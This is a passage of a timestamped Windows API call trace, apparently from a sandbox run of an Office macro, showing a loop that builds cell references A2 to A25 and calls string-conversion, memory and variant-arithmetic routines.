0xa267770 [0157.777] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.777] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.777] longjmp () [0157.882] GetAsyncKeyState (vKey=27) returned 0 [0157.883] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.884] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.884] VarBstrCat (in: bstrLeft="A", bstrRight="2", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.884] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.884] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.884] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.884] longjmp () [0157.888] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.888] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.888] VarBstrCat (in: bstrLeft="A", bstrRight="3", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.889] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.889] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.889] longjmp () [0157.892] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.892] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.897] VarBstrCat (in: bstrLeft="A", bstrRight="4", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.897] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.897] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.898] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.898] longjmp () [0157.899] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.899] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.925] VarBstrCat (in: bstrLeft="A", bstrRight="5", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.925] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.925] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.925] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.925] longjmp () [0157.926] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.926] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.927] VarBstrCat (in: bstrLeft="A", bstrRight="6", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.928] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.928] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.928] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.928] longjmp () [0157.929] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.929] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.935] VarBstrCat (in: bstrLeft="A", bstrRight="7", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.935] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.935] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.935] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.935] longjmp () [0157.937] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.937] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.945] VarBstrCat (in: bstrLeft="A", bstrRight="8", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.946] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.946] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.946] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.946] longjmp () [0157.947] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.947] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.948] VarBstrCat (in: bstrLeft="A", bstrRight="9", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.949] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.949] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.949] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.949] longjmp () [0157.950] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.950] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.951] VarBstrCat (in: bstrLeft="A", bstrRight="10", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.951] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.951] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.951] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.951] longjmp () [0157.952] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.952] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.965] VarBstrCat (in: bstrLeft="A", bstrRight="11", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.966] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.966] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.966] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.966] longjmp () [0157.967] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.967] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.968] VarBstrCat (in: bstrLeft="A", bstrRight="12", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.968] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.968] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.968] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.968] longjmp () [0157.969] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0157.969] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0157.999] VarBstrCat (in: bstrLeft="A", bstrRight="13", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0157.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0157.999] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0157.999] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0157.999] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0157.999] longjmp () [0158.000] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.000] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.013] VarBstrCat (in: bstrLeft="A", bstrRight="14", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.013] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0158.013] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.013] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0158.013] longjmp () [0158.014] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.014] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.015] VarBstrCat (in: bstrLeft="A", bstrRight="15", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.015] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0158.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.015] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0158.015] longjmp () [0158.016] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.016] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.068] GetAsyncKeyState (vKey=27) returned 0 [0158.068] VarBstrCat (in: bstrLeft="A", bstrRight="16", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.068] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267770 [0158.068] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267770, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.068] IMalloc:Free (This=0x7fefecb5380, pv=0xa267770) [0158.068] longjmp () [0158.069] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.069] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.100] VarBstrCat (in: bstrLeft="A", bstrRight="17", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.100] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.100] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.101] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.101] longjmp () [0158.102] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.102] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.130] VarBstrCat (in: bstrLeft="A", bstrRight="18", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.131] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.131] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.131] longjmp () [0158.132] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.132] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.173] VarBstrCat (in: bstrLeft="A", bstrRight="19", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.173] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.174] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.174] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.174] longjmp () [0158.175] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.175] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.205] VarBstrCat (in: bstrLeft="A", bstrRight="20", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.206] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.206] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.206] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.206] longjmp () [0158.207] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.207] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.238] VarBstrCat (in: bstrLeft="A", bstrRight="21", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.238] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.238] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.238] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.238] longjmp () [0158.240] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.240] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.270] GetAsyncKeyState (vKey=27) returned 0 [0158.270] VarBstrCat (in: bstrLeft="A", bstrRight="22", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.270] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.270] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.270] longjmp () [0158.272] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.272] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.303] VarBstrCat (in: bstrLeft="A", bstrRight="23", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.303] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.303] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.303] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.303] longjmp () [0158.304] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.304] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.334] VarBstrCat (in: bstrLeft="A", bstrRight="24", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.334] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.334] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.334] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.334] longjmp () [0158.336] VarCmp (pvarLeft=0xa0260c8, pvarRight=0xa0261e8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0158.336] VarAdd (in: pvarLeft=0xa0261a0, pvarRight=0xa0260c8, pvarResult=0xa0260f0 | out: pvarResult=0xa0260f0) returned 0x0 [0158.365] VarBstrCat (in: bstrLeft="A", bstrRight="25", pbstrResult=0x1de060 | out: pbstrResult=0x1de060) returned 0x0 [0158.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0158.365] IMalloc:Alloc (This=0x7fefecb5380, cb=0x7) returned 0xa267860 [0158.365] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Range", cchWideChar=-1, lpMultiByteStr=0xa267860, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Range", lpUsedDefaultChar=0x0) returned 6 [0158.365] IMalloc:Free (This=0x7fefecb5380, pv=0xa267860) [0158.365] longjmp () [0158.366] VarCmp 